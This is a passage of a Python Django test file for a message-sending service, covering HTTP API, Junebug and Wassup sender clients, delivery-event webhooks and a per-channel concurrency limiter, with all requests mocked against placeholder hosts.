        self.assertEqual(message_sender.account_key, "account-key")
        self.assertEqual(message_sender.conversation_key, "conv-key")
        self.assertEqual(message_sender.conversation_token, "account-token")

    def test_create_http_api_voice(self):
        """A generic HTTP API voice channel yields an HttpApiSender."""
        channel = Channel.objects.get(channel_id="HTTP_API_VOICE")
        message_sender = MessageClientFactory.create(channel)
        self.assertIsInstance(message_sender, HttpApiSender)
        self.assertEqual(message_sender.api_url, "http://example.com/")
        self.assertEqual(message_sender.auth, ("username", "password"))

    def test_create_http_api_text(self):
        """A generic HTTP API text channel yields an HttpApiSender."""
        channel = Channel.objects.get(channel_id="HTTP_API_TEXT")
        message_sender = MessageClientFactory.create(channel)
        self.assertIsInstance(message_sender, HttpApiSender)
        self.assertEqual(message_sender.api_url, "http://example.com/")
        self.assertEqual(message_sender.auth, ("username", "password"))

    def test_create_whatsapp_api(self):
        """A WhatsApp channel yields a configured WhatsAppApiSender."""
        channel = Channel.objects.get(channel_id="WHATSAPP")
        message_sender = MessageClientFactory.create(channel)
        self.assertIsInstance(message_sender, WhatsAppApiSender)
        self.assertEqual(message_sender.api_url, "http://example.com/")
        self.assertEqual(message_sender.token, "http-api-token")
        self.assertEqual(message_sender.hsm_namespace, "whatsapp:hsm:test")
        self.assertEqual(message_sender.hsm_element_name, "test")

    def test_create_no_backend_type_specified_default(self):
        """
        If no message backend is specified, it should use the default channel.
        """
        message_sender = MessageClientFactory.create()
        self.assertIsInstance(message_sender, JunebugApiSender)
        self.assertEqual(message_sender.api_url, "http://example.com/")
        self.assertEqual(message_sender.auth, ("username", "password"))
class TestGenericHttpApiSender(TestCase):
    """Tests for the generic HTTP API message-sender client."""

    def setUp(self):
        super(TestGenericHttpApiSender, self).setUp()
        # Create the standard set of test channels used by these tests.
        make_channels()
@responses.activate
def test_send_text(self):
    """
    send_text should POST the correct JSON payload to the configured API.
    """
    responses.add(
        responses.POST,
        "http://example.com/",
        json={"result": {"message_id": "message-uuid"}},
        status=200,
        content_type="application/json",
    )

    sender = MessageClientFactory.create(
        Channel.objects.get(channel_id="HTTP_API_TEXT")
    )
    result = sender.send_text("+1234", "Test", session_event="new")
    self.assertEqual(result["message_id"], "message-uuid")

    # Exactly one request must have been made; inspect its JSON body.
    self.assertEqual(len(responses.calls), 1)
    payload = json.loads(responses.calls[0].request.body)
    self.assertEqual(payload["to"], "+1234")
    self.assertEqual(payload["from"], "+4321")
    self.assertEqual(payload["content"], "Test")
    self.assertEqual(payload["channel_data"]["session_event"], "new")
@responses.activate
def test_send_voice(self):
    """
    Using the send_voice function should send a request to the api with the
    correct JSON data.
    """
    responses.add(
        responses.POST,
        "http://example.com/",
        json={"result": {"message_id": "message-uuid"}},
        status=200,
        content_type="application/json",
    )
    channel = Channel.objects.get(channel_id="HTTP_API_VOICE")
    message_sender = MessageClientFactory.create(channel)
    # Empty content: voice messages carry their payload via speech_url.
    res = message_sender.send_voice(
        "+1234", "", speech_url="http://sbm.com/test.mp3", session_event="new"
    )
    self.assertEqual(res["message_id"], "message-uuid")
    # Exactly one request was made; unpack it and inspect the JSON body.
    [r] = responses.calls
    r = json.loads(r.request.body)
    self.assertEqual(r["to"], "+1234")
    # "+4321" comes from the channel's HTTP_API_FROM configuration.
    self.assertEqual(r["from"], "+4321")
    self.assertEqual(r["content"], "")
    self.assertEqual(r["channel_data"]["session_event"], "new")
    self.assertEqual(
        r["channel_data"]["voice"]["speech_url"], "http://sbm.com/test.mp3"
    )
@responses.activate
def test_send_voice_multiple(self):
    """
    Using the send_voice function should send a request to the api with the
    correct JSON data.
    """
    responses.add(
        responses.POST,
        "http://example.com/",
        json={"result": {"message_id": "message-uuid"}},
        status=200,
        content_type="application/json",
    )
    channel = Channel.objects.get(channel_id="HTTP_API_VOICE")
    message_sender = MessageClientFactory.create(channel)
    # speech_url may be a list of URLs; it should be passed through as-is.
    res = message_sender.send_voice(
        "+1234",
        "",
        speech_url=["http://sbm.com/test1.mp3", "http://sbm.com/test2.mp3"],
        session_event="new",
    )
    self.assertEqual(res["message_id"], "message-uuid")
    # Exactly one request was made; unpack it and inspect the JSON body.
    [r] = responses.calls
    r = json.loads(r.request.body)
    self.assertEqual(r["to"], "+1234")
    self.assertEqual(r["from"], "+4321")
    self.assertEqual(r["content"], "")
    self.assertEqual(r["channel_data"]["session_event"], "new")
    self.assertEqual(
        r["channel_data"]["voice"]["speech_url"],
        ["http://sbm.com/test1.mp3", "http://sbm.com/test2.mp3"],
    )
@responses.activate
def test_send_voice_override_payload(self):
    """
    Using the send_voice function should send a request to the api with the
    correct JSON data based on the override_payload setting in the channel.
    The full path should be stripped if the STRIP_FILEPATH key is present.
    """
    responses.add(
        responses.POST,
        "http://example.com/",
        json={"result": {"message_id": "message-uuid"}},
        status=200,
        content_type="application/json",
    )
    # OVERRIDE_PAYLOAD remaps the outgoing payload: each key names the new
    # field, each value is a dotted path into the default payload.
    http_channel_override_payload = {
        "channel_id": "HTTP_API_VOICE_OP",
        "channel_type": Channel.HTTP_API_TYPE,
        "default": False,
        "configuration": {
            "HTTP_API_URL": "http://example.com/",
            "HTTP_API_AUTH": ("username", "password"),
            "HTTP_API_FROM": "+4321",
            "OVERRIDE_PAYLOAD": {
                "mobile_no": "to",
                "filename": "channel_data.voice.speech_url",
                "nested_data": {"from_addr": "from", "unknown": "unknown"},
            },
            "STRIP_FILEPATH": "true",
        },
        "concurrency_limit": 2,
        "message_timeout": 20,
        "message_delay": 10,
    }
    channel = Channel.objects.create(**http_channel_override_payload)
    message_sender = MessageClientFactory.create(channel)
    res = message_sender.send_voice(
        "+1234", "", speech_url="http://sbm.com/test.mp3", session_event="new"
    )
    self.assertEqual(res["message_id"], "message-uuid")
    # Exactly one request was made; unpack it and inspect the JSON body.
    [r] = responses.calls
    r = json.loads(r.request.body)
    self.assertEqual(r["mobile_no"], "+1234")
    self.assertEqual(r["nested_data"]["from_addr"], "+4321")
    # A path that doesn't resolve is passed through verbatim.
    self.assertEqual(r["nested_data"]["unknown"], "unknown")
    # STRIP_FILEPATH reduces the URL to just the file name.
    self.assertEqual(r["filename"], "test.mp3")
@responses.activate
def test_send_voice_override_payload_multiple_urls(self):
    """
    Using the send_voice function should send a request to the api with the
    correct JSON data based on the override_payload setting in the channel.
    The full path should be stripped if the STRIP_FILEPATH key is present,
    even if there is a list of urls.
    """
    responses.add(
        responses.POST,
        "http://example.com/",
        json={"result": {"message_id": "message-uuid"}},
        status=200,
        content_type="application/json",
    )
    # Same OVERRIDE_PAYLOAD mapping as the single-URL test above.
    http_channel_override_payload = {
        "channel_id": "HTTP_API_VOICE_OP",
        "channel_type": Channel.HTTP_API_TYPE,
        "default": False,
        "configuration": {
            "HTTP_API_URL": "http://example.com/",
            "HTTP_API_AUTH": ("username", "password"),
            "HTTP_API_FROM": "+4321",
            "OVERRIDE_PAYLOAD": {
                "mobile_no": "to",
                "filename": "channel_data.voice.speech_url",
                "nested_data": {"from_addr": "from", "unknown": "unknown"},
            },
            "STRIP_FILEPATH": "true",
        },
        "concurrency_limit": 2,
        "message_timeout": 20,
        "message_delay": 10,
    }
    channel = Channel.objects.create(**http_channel_override_payload)
    message_sender = MessageClientFactory.create(channel)
    res = message_sender.send_voice(
        "+1234",
        "",
        speech_url=["http://sbm.com/test1.mp3", "http://sbm.com/test2.mp3"],
        session_event="new",
    )
    self.assertEqual(res["message_id"], "message-uuid")
    # Exactly one request was made; unpack it and inspect the JSON body.
    [r] = responses.calls
    r = json.loads(r.request.body)
    self.assertEqual(r["mobile_no"], "+1234")
    self.assertEqual(r["nested_data"]["from_addr"], "+4321")
    self.assertEqual(r["nested_data"]["unknown"], "unknown")
    # STRIP_FILEPATH is applied to every URL in the list.
    self.assertEqual(r["filename"], ["test1.mp3", "test2.mp3"])
@responses.activate
def test_send_voice_strip_filepath_language(self):
    """
    With STRIP_FILEPATH set, send_voice must drop the host portion of
    each speech URL but keep language-code (and deeper) path segments.
    """
    responses.add(
        responses.POST,
        "http://example.com/",
        json={"result": {"message_id": "message-uuid"}},
        status=200,
        content_type="application/json",
    )
    channel_config = {
        "channel_id": "HTTP_API_VOICE_OP",
        "channel_type": Channel.HTTP_API_TYPE,
        "default": False,
        "configuration": {
            "HTTP_API_URL": "http://example.com/",
            "HTTP_API_AUTH": ("username", "password"),
            "HTTP_API_FROM": "+4321",
            "STRIP_FILEPATH": "true",
        },
        "concurrency_limit": 2,
        "message_timeout": 20,
        "message_delay": 10,
    }
    sender = MessageClientFactory.create(Channel.objects.create(**channel_config))
    result = sender.send_voice(
        "+1234",
        "",
        speech_url=[
            "http://sbm.com/eng_ZA/test1.mp3",
            "http://sbm.com/zul_ZA/nested/test2.mp3",
            "http://sbm.com/test3.mp3",
        ],
        session_event="new",
    )
    self.assertEqual(result["message_id"], "message-uuid")
    [call] = responses.calls
    payload = json.loads(call.request.body)
    self.assertEqual(
        payload["channel_data"]["voice"]["speech_url"],
        ["eng_ZA/test1.mp3", "zul_ZA/nested/test2.mp3", "test3.mp3"],
    )
@responses.activate
def test_send_voice_strip_filepath_unicode(self):
    """
    STRIP_FILEPATH must also work when speech_url is a single (unicode)
    string rather than a list: only the filename is sent on.
    """
    responses.add(
        responses.POST,
        "http://example.com/",
        json={"result": {"message_id": "message-uuid"}},
        status=200,
        content_type="application/json",
    )
    channel_config = {
        "channel_id": "HTTP_API_VOICE_OP",
        "channel_type": Channel.HTTP_API_TYPE,
        "default": False,
        "configuration": {
            "HTTP_API_URL": "http://example.com/",
            "HTTP_API_AUTH": ("username", "password"),
            "HTTP_API_FROM": "+4321",
            "STRIP_FILEPATH": "true",
        },
        "concurrency_limit": 2,
        "message_timeout": 20,
        "message_delay": 10,
    }
    sender = MessageClientFactory.create(Channel.objects.create(**channel_config))
    result = sender.send_voice(
        "+1234", "", speech_url="http://sbm.com/test.mp3", session_event="new"
    )
    self.assertEqual(result["message_id"], "message-uuid")
    [call] = responses.calls
    payload = json.loads(call.request.body)
    self.assertEqual(payload["channel_data"]["voice"]["speech_url"], "test.mp3")
def test_fire_metric(self):
    """
    The generic HTTP API sender has no metrics support, so fire_metric
    must raise HttpApiSenderException.
    """
    sender = MessageClientFactory.create(
        Channel.objects.get(channel_id="HTTP_API_VOICE")
    )
    with self.assertRaises(HttpApiSenderException):
        sender.fire_metric("foo.bar", 3.0, agg="sum")
def test_send_image(self):
    """
    The generic HTTP API sender has no image support, so send_image
    must raise HttpApiSenderException.
    """
    sender = MessageClientFactory.create(
        Channel.objects.get(channel_id="HTTP_API_VOICE")
    )
    with self.assertRaises(HttpApiSenderException):
        sender.send_image("+1234", "Test", image_url="http://test.jpg")
class TestJunebugAPISender(TestCase):
    """Tests for the Junebug message-sending client."""

    def setUp(self):
        super(TestJunebugAPISender, self).setUp()
        make_channels()

    @responses.activate
    def test_send_text(self):
        """
        send_text must POST the expected JSON payload (addresses, content,
        session event and event URL) to Junebug.
        """
        responses.add(
            responses.POST,
            "http://example.com/",
            json={"result": {"message_id": "message-uuid"}},
            status=200,
            content_type="application/json",
        )
        sender = MessageClientFactory.create(
            Channel.objects.get(channel_id="JUNE_TEXT")
        )
        result = sender.send_text("+1234", "Test", session_event="resume")
        self.assertEqual(result["message_id"], "message-uuid")
        [call] = responses.calls
        payload = json.loads(call.request.body)
        self.assertEqual(payload["to"], "+1234")
        self.assertEqual(payload["from"], "+4321")
        self.assertEqual(payload["content"], "Test")
        self.assertEqual(payload["channel_data"]["session_event"], "resume")
        self.assertEqual(
            payload["event_url"], "http://example.com/api/v1/events/junebug"
        )

    @responses.activate
    def test_send_voice(self):
        """
        send_voice must POST the expected JSON payload, including the
        voice-specific channel data, to Junebug.
        """
        responses.add(
            responses.POST,
            "http://example.com/",
            json={"result": {"message_id": "message-uuid"}},
            status=200,
            content_type="application/json",
        )
        sender = MessageClientFactory.create(
            Channel.objects.get(channel_id="JUNE_VOICE")
        )
        result = sender.send_voice(
            "+1234",
            "Test",
            speech_url="http://test.mp3",
            wait_for="#",
            session_event="resume",
        )
        self.assertEqual(result["message_id"], "message-uuid")
        [call] = responses.calls
        payload = json.loads(call.request.body)
        self.assertEqual(payload["to"], "+1234")
        self.assertEqual(payload["from"], "+4321")
        self.assertEqual(payload["content"], "Test")
        self.assertEqual(payload["channel_data"]["session_event"], "resume")
        self.assertEqual(
            payload["channel_data"]["voice"]["speech_url"], "http://test.mp3"
        )
        self.assertEqual(payload["channel_data"]["voice"]["wait_for"], "#")
        self.assertEqual(
            payload["event_url"], "http://example.com/api/v1/events/junebug"
        )

    def test_fire_metric(self):
        """
        Junebug has no metrics support, so fire_metric must raise
        HttpApiSenderException.
        """
        sender = MessageClientFactory.create(
            Channel.objects.get(channel_id="JUNE_VOICE")
        )
        with self.assertRaises(HttpApiSenderException):
            sender.fire_metric("foo.bar", 3.0, agg="sum")
class TestWassupAPISender(TestCase):
    """Tests for the Wassup (WhatsApp) message-sending client."""

    def setUp(self):
        super(TestWassupAPISender, self).setUp()
        make_channels()

    @responses.activate
    def test_send_text(self):
        """
        send_text on an HSM channel must POST the HSM payload to the
        wassup HSM send endpoint.
        """
        responses.add(
            responses.POST,
            "http://example.com/api/v1/hsms/the-uuid/send/",
            json={"uuid": "message-uuid"},
            status=200,
            content_type="application/json",
        )
        sender = MessageClientFactory.create(
            Channel.objects.get(channel_id="WASSUP_API")
        )
        result = sender.send_text("+1234", "Test", session_event="resume")
        self.assertEqual(result["message_id"], "message-uuid")
        [call] = responses.calls
        payload = json.loads(call.request.body.decode())
        self.assertEqual(payload["to_addr"], "+1234")
        self.assertEqual(payload["localizable_params"], [{"default": "Test"}])

    @responses.activate
    def test_send_non_hsm_text(self):
        """
        send_text on a non-HSM channel must POST a plain message to the
        wassup messages endpoint.
        """
        responses.add(
            responses.POST,
            "http://example.com/api/v1/messages/",
            json={"uuid": "message-uuid"},
            status=200,
            content_type="application/json",
        )
        sender = MessageClientFactory.create(
            Channel.objects.get(channel_id="WASSUP_API_NON_HSM")
        )
        result = sender.send_text(
            "+1234", "Test non HSM message", session_event="resume"
        )
        self.assertEqual(result["message_id"], "message-uuid")
        [call] = responses.calls
        payload = json.loads(call.request.body.decode())
        self.assertEqual(payload["to_addr"], "+1234")
        self.assertEqual(payload["number"], "+4321")
        self.assertEqual(payload["content"], "Test non HSM message")

    @responses.activate
    def test_send_image(self):
        """
        send_image must fetch the image and POST it to wassup as a
        multipart attachment.
        """
        responses.add(
            responses.GET,
            "http://test.jpg",
            body="",
            status=200,
            content_type="image/jpeg",
            stream=True,
        )
        responses.add(
            responses.POST,
            "http://example.com/api/v1/messages/",
            json={"uuid": "message-uuid"},
            status=200,
            content_type="application/json",
        )
        sender = MessageClientFactory.create(
            Channel.objects.get(channel_id="WASSUP_API")
        )
        result = sender.send_image("+1234", "Test", image_url="http://test.jpg")
        self.assertEqual(result["message_id"], "message-uuid")
        # First call downloads the image, second posts the message.
        [image_call, send_call] = responses.calls
        body = send_call.request.body.decode()
        self.assertIn("+1234", body)
        self.assertIn("+4321", body)
        self.assertIn("image_attachment", body)
        self.assertIn('filename="test.jpg"', body)
        self.assertIn("Content-Type: image/jpeg", body)

    @responses.activate
    def test_send_voice(self):
        """
        send_voice must fetch the audio and POST it to wassup as a
        multipart attachment.
        """
        responses.add(
            responses.GET,
            "http://test.mp3",
            body="",
            status=200,
            content_type="audio/mp3",
            stream=True,
        )
        responses.add(
            responses.POST,
            "http://example.com/api/v1/messages/",
            json={"uuid": "message-uuid"},
            status=200,
            content_type="application/json",
        )
        sender = MessageClientFactory.create(
            Channel.objects.get(channel_id="WASSUP_API")
        )
        result = sender.send_voice(
            "+1234",
            "Test",
            speech_url="http://test.mp3",
            wait_for="#",
            session_event="resume",
        )
        self.assertEqual(result["message_id"], "message-uuid")
        # First call downloads the audio, second posts the message.
        [audio_call, send_call] = responses.calls
        body = send_call.request.body.decode()
        self.assertIn("+1234", body)
        self.assertIn("+4321", body)
        self.assertIn("audio_attachment", body)

    def test_fire_metric(self):
        """
        Wassup has no metrics support, so fire_metric must raise
        WassupApiSenderException.
        """
        sender = MessageClientFactory.create(
            Channel.objects.get(channel_id="WASSUP_API")
        )
        with self.assertRaises(WassupApiSenderException):
            sender.fire_metric("foo.bar", 3.0, agg="sum")
class TestWassupEventsApi(AuthenticatedAPITestCase):
    """
    Tests for the wassup-events webhook endpoint: delivery-status events
    (ack/nack/delivered/failed) and inbound messages posted by Wassup.
    """

    def test_event_missing_fields(self):
        """
        If there are missing fields in the request, an error response should
        be returned.
        """
        response = self.client.post(
            reverse("wassup-events"), json.dumps({}), content_type="application/json"
        )
        self.assertEqual(
            json.loads(response.content.decode()),
            {
                "accepted": False,
                "reason": {
                    "data": ["This field is required."],
                    "hook": ["This field is required."],
                },
            },
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_event_no_message(self):
        """
        If we cannot find the message for the event, an error response should
        be returned.
        """
        event = {
            "hook": {"event": "message.direct_outbound.status"},
            "data": {
                "message_uuid": "bad-message-id",
                "status": "sent",
                "timestamp": "2018-05-04T16:00:18Z",
            },
        }
        response = self.client.post(
            reverse("wassup-events"), json.dumps(event), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(
            json.loads(response.content.decode()),
            {"accepted": False, "reason": "Cannot find message for ID bad-message-id"},
        )

    @patch("message_sender.views.fire_delivery_hook")
    def test_event_ack(self, mock_hook):
        """A submitted event should update the message object accordingly."""
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        event = {
            "hook": {"event": "message.direct_outbound.status"},
            "data": {
                "message_uuid": d.vumi_message_id,
                "status": "sent",
                "timestamp": "2018-05-04T16:00:18Z",
            },
        }
        response = self.client.post(
            reverse("wassup-events"), json.dumps(event), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.delivered, True)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata["ack_timestamp"], "2018-05-04T16:00:18Z")
        # An ack must not trigger a resend, so the send log must be absent.
        self.assertEqual(
            False,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123'"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @responses.activate
    @patch("message_sender.views.fire_delivery_hook")
    def test_event_nack(self, mock_hook):
        """
        A rejected event should retry and update the message object accordingly
        """
        self.add_metrics_response()
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        # Re-enable the post-save handler (disconnected by the fixtures) so
        # the nack-triggered retry actually fires a send.
        post_save.connect(
            psh_fire_msg_action_if_new,
            sender=Outbound,
            dispatch_uid="psh_fire_msg_action_if_new",
        )
        event = {
            "hook": {"event": "message.direct_outbound.status"},
            "data": {
                "status": "unsent",
                "message_uuid": d.vumi_message_id,
                "timestamp": "2018-05-04T16:00:18Z",
                "description": "stars not aligned",
            },
        }
        response = self.client.post(
            reverse("wassup-events"), json.dumps(event), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        c = Outbound.objects.get(pk=existing)
        self.assertEqual(c.delivered, False)
        self.assertEqual(c.attempts, 2)
        self.assertEqual(c.metadata["nack_reason"], "stars not aligned")
        # The retry should have logged a new send attempt.
        self.assertEqual(
            True,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123' "
                "[session_event: new]"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @patch("message_sender.views.fire_delivery_hook")
    def test_event_delivery_succeeded(self, mock_hook):
        """A successful delivery should update the message accordingly."""
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        event = {
            "hook": {"event": "message.direct_outbound.status"},
            "data": {
                "status": "delivered",
                "message_uuid": d.vumi_message_id,
                "timestamp": "2018-05-04T16:00:18Z",
            },
        }
        response = self.client.post(
            reverse("wassup-events"), json.dumps(event), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.delivered, True)
        self.assertEqual(d.attempts, 1)
        self.assertEqual(d.metadata["delivery_timestamp"], "2018-05-04T16:00:18Z")
        # Delivery must not trigger a resend, so the send log must be absent.
        self.assertEqual(
            False,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123'"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @responses.activate
    @patch("message_sender.views.fire_delivery_hook")
    def test_event_delivery_failed(self, mock_hook):
        """
        A failed delivery should retry and update the message accordingly.
        """
        self.add_metrics_response()
        existing = self.make_outbound()
        d = Outbound.objects.get(pk=existing)
        event = {
            "hook": {"event": "message.direct_outbound.status"},
            "data": {
                "message_uuid": d.vumi_message_id,
                "status": "failed",
                "description": "computer said no",
                "timestamp": "2018-05-04T16:00:18Z",
            },
        }
        response = self.client.post(
            reverse("wassup-events"), json.dumps(event), content_type="application/json"
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        d = Outbound.objects.get(pk=existing)
        self.assertEqual(d.delivered, False)
        self.assertEqual(d.attempts, 2)
        self.assertEqual(d.metadata["delivery_failed_reason"], "computer said no")
        self.assertEqual(
            False,
            self.check_logs(
                "Message: 'Simple outbound message' sent to '+27820000123'"
            ),
        )
        mock_hook.assert_called_once_with(d)

    @responses.activate
    def test_create_inbound_wassup_message(self):
        """
        If wassup send an inbound message to the inbound endpoint, then a
        new Inbound should be created with the specified parameters.
        """
        channel = Channel.objects.get(channel_id="WASSUP_API")
        self.add_metrics_response()
        message_id = str(uuid.uuid4())
        event = {
            "hook": {"event": "message.inbound"},
            "data": {
                "uuid": message_id,
                "content": "the content",
                "in_reply_to": None,
                "metadata": {},
                "from_addr": "+27820000123456789",
                "to_addr": "+27000000000",
            },
        }
        self.add_identity_search_response("+27820000123456789", "0c03d360")
        response = self.client.post(
            reverse("channels-inbound", kwargs={"channel_id": channel.channel_id}),
            json.dumps(event),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Inbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.message_id, message_id)
        self.assertEqual(d.to_addr, "+27000000000")
        self.assertEqual(d.from_identity, "0c03d360")
        self.assertEqual(d.content, "the content")
        self.assertEqual(d.transport_name, "")
        self.assertEqual(d.transport_type, None)
        self.assertEqual(d.helper_metadata, {})

    @responses.activate
    def test_create_inbound_wassup_unknown_msisdn(self):
        """
        If wassup sends a new inbound message to the inbound endpoint, for
        an address that doesn't exist in the identity store, then a new
        identity should be created for that address.
        """
        # NOTE(review): a search response returning "0c03d360" is mocked
        # below as well as a create-identity response -- presumably the
        # search helper returns an empty result set here; verify against
        # add_identity_search_response's implementation.
        channel = Channel.objects.get(channel_id="WASSUP_API")
        self.add_metrics_response()
        message_id = str(uuid.uuid4())
        event = {
            "hook": {"event": "message.inbound"},
            "data": {
                "uuid": message_id,
                "content": "the content",
                "in_reply_to": None,
                "metadata": {},
                "from_addr": "+27820000123456789",
                "to_addr": "+27000000000",
            },
        }
        self.add_identity_search_response("+27820000123456789", "0c03d360")
        self.add_create_identity_response("0c03d360", "+27820000123456789")
        response = self.client.post(
            reverse("channels-inbound", kwargs={"channel_id": channel.channel_id}),
            json.dumps(event),
            content_type="application/json",
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        d = Inbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.message_id, message_id)
        self.assertEqual(d.to_addr, "+27000000000")
        self.assertEqual(d.from_identity, "0c03d360")
        self.assertEqual(d.content, "the content")
        self.assertEqual(d.transport_name, "")
        self.assertEqual(d.transport_type, None)
        self.assertEqual(d.helper_metadata, {})
class TestConcurrencyLimiter(AuthenticatedAPITestCase):
    """
    Tests for the per-channel concurrency limiter that caps how many
    messages may be in flight per time bucket, backed by the Django cache.
    """

    def make_outbound(self, to_addr, channel=None):
        """Create an Outbound without firing the post-save send task.

        :param to_addr: address the message is for
        :param channel: optional channel_id to attach the message to
        :return: the created Outbound instance
        """
        if channel:
            channel = Channel.objects.get(channel_id=channel)
        self.add_identity_search_response(to_addr, "098734738")
        self._replace_post_save_hooks_outbound()  # don't let fixtures fire
        outbound_message = {
            "to_addr": to_addr,
            "vumi_message_id": "075a32da-e1e4-4424-be46-1d09b71056fd",
            "content": "Simple outbound message",
            "delivered": False,
            "metadata": {"voice_speech_url": "http://test.com"},
            "channel": channel,
        }
        outbound = Outbound.objects.create(**outbound_message)
        self._restore_post_save_hooks_outbound()  # let tests fire tasks
        return outbound

    def set_cache_entry(self, msg_type, bucket, value):
        """Seed the fake cache with a message count for a time bucket."""
        key = "%s_messages_at_%s" % (msg_type, bucket)
        self.fake_cache.cache_data[key] = value

    def setUp(self):
        super(TestConcurrencyLimiter, self).setUp()
        self.fake_cache = MockCache()

    @responses.activate
    @patch("time.time", MagicMock(return_value=1479131658.000000))
    @patch("django.core.cache.cache.get")
    @patch("django.core.cache.cache.add")
    @patch("django.core.cache.cache.incr")
    def test_limiter_limit_not_reached(self, mock_incr, mock_add, mock_get):
        """
        Messages under the limit should get sent.
        """
        self.add_metrics_response()
        # Fake cache calls
        mock_incr.side_effect = self.fake_cache.incr
        mock_add.side_effect = self.fake_cache.add
        mock_get.side_effect = self.fake_cache.get
        outbound1 = self.make_outbound(to_addr="+27820000123", channel="JUNE_VOICE2")
        outbound2 = self.make_outbound(to_addr="+27987", channel="JUNE_VOICE2")
        send_message(outbound1.pk)
        send_message(outbound2.pk)
        self.assertTrue(
            self.check_logs(
                "Message: '%s' sent to '%s' [session_event: new] [voice: "
                "{'speech_url': 'http://test.com'}]"
                % (outbound1.content, outbound1.to_addr)
            )
        )
        self.assertTrue(
            self.check_logs(
                "Message: '%s' sent to '%s' [session_event: new] [voice: "
                "{'speech_url': 'http://test.com'}]"
                % (outbound2.content, outbound2.to_addr)
            )
        )
        outbound1.refresh_from_db()
        self.assertIsNotNone(outbound1.last_sent_time)
        outbound2.refresh_from_db()
        self.assertIsNotNone(outbound2.last_sent_time)
        # Both sends land in the same bucket because time.time is frozen.
        self.assertEqual(len(self.fake_cache.cache_data), 1)
        bucket = 1479131658 // 60  # time() // bucket_size
        self.assertEqual(
            self.fake_cache.cache_data["JUNE_VOICE2_messages_at_%s" % bucket], 2
        )

    @responses.activate
    @patch("time.time", MagicMock(return_value=1479131658.000000))
    @patch("django.core.cache.cache.get")
    @patch("django.core.cache.cache.add")
    @patch("django.core.cache.cache.incr")
    @patch("message_sender.tasks.send_message.retry")
    def test_limiter_limit_reached(self, mock_retry, mock_incr, mock_add, mock_get):
        """
        Messages under the limit should get sent. Messages over the limit
        should get retried
        """
        self.add_metrics_response()
        mock_retry.side_effect = Retry
        # Fake cache calls
        mock_incr.side_effect = self.fake_cache.incr
        mock_add.side_effect = self.fake_cache.add
        mock_get.side_effect = self.fake_cache.get
        outbound1 = self.make_outbound(to_addr="+27820000123", channel="JUNE_VOICE")
        outbound2 = self.make_outbound(to_addr="+27987", channel="JUNE_VOICE")
        send_message(outbound1.pk)
        # The second message exceeds the channel's concurrency limit and
        # must be retried instead of sent.
        with self.assertRaises(Retry):
            send_message(outbound2.pk)
        mock_retry.assert_called_with(countdown=100)
        self.assertTrue(
            self.check_logs(
                "Message: '%s' sent to '%s' [session_event: new] [voice: "
                "{'speech_url': 'http://test.com'}]"
                % (outbound1.content, outbound1.to_addr)
            )
        )
        self.assertFalse(
            self.check_logs(
                "Message: '%s' sent to '%s' [session_event: new] "
                "[voice: {'speech_url': 'http://test.com'}]"
                % (outbound2.content, outbound2.to_addr)
            )
        )
        outbound1.refresh_from_db()
        self.assertIsNotNone(outbound1.last_sent_time)
        outbound2.refresh_from_db()
        self.assertIsNone(outbound2.last_sent_time)
        self.assertEqual(len(self.fake_cache.cache_data), 1)
        bucket = 1479131658 // 60  # time() // bucket_size
        self.assertEqual(
            self.fake_cache.cache_data["JUNE_VOICE_messages_at_%s" % bucket], 1
        )

    @patch("time.time", MagicMock(return_value=1479131640.000000))
    @patch("django.core.cache.cache.get")
    def test_limiter_buckets(self, mock_get):
        """
        The correct buckets should count towards the message count.
        """
        # Fake cache calls
        mock_get.side_effect = self.fake_cache.get
        now = 1479131640
        self.set_cache_entry("JUNE_VOICE", (now - 200) // 60, 1)  # Too old
        self.set_cache_entry("JUNE_VOICE", (now - 121) // 60, 10)  # Over delay
        self.set_cache_entry(
            "JUNE_VOICE", (now - 120) // 60, 100
        )  # Within delay  # noqa
        self.set_cache_entry("JUNE_VOICE", now // 60, 1000)  # Now
        self.set_cache_entry("JUNE_VOICE", (now + 60) // 60, 10000)  # In future # noqa
        channel = Channel.objects.get(channel_id="JUNE_VOICE")
        count = ConcurrencyLimiter.get_current_message_count(channel)
        # Only the "within delay" and "now" buckets count: 100 + 1000.
        self.assertEqual(count, 1100)

    @patch("time.time", MagicMock(return_value=1479131658.000000))
    @patch("django.core.cache.cache.get_or_set")
    @patch("django.core.cache.cache.decr")
    def test_limiter_decr_count(self, mock_decr, mock_get_or_set):
        """
        Events for messages should decrement the counter unless the message is
        too old.
        """
        # Fake cache calls
        mock_get_or_set.side_effect = self.fake_cache.get_or_set
        mock_decr.side_effect = self.fake_cache.decr
        self.set_cache_entry("JUNE_VOICE", 1479131535 // 60, 1)  # Past delay
        self.set_cache_entry("JUNE_VOICE", 1479131588 // 60, 1)  # Within delay
        self.set_cache_entry(
            "JUNE_VOICE", 1479131648 // 60, -0
        )  # Invalid value  # noqa
        channel = Channel.objects.get(channel_id="JUNE_VOICE")

        def get_utc(timestamp):
            # Build an aware datetime in the local test timezone.
            return datetime.fromtimestamp(timestamp).replace(
                tzinfo=timezone.now().tzinfo
            )

        ConcurrencyLimiter.decr_message_count(channel, get_utc(1479131535))
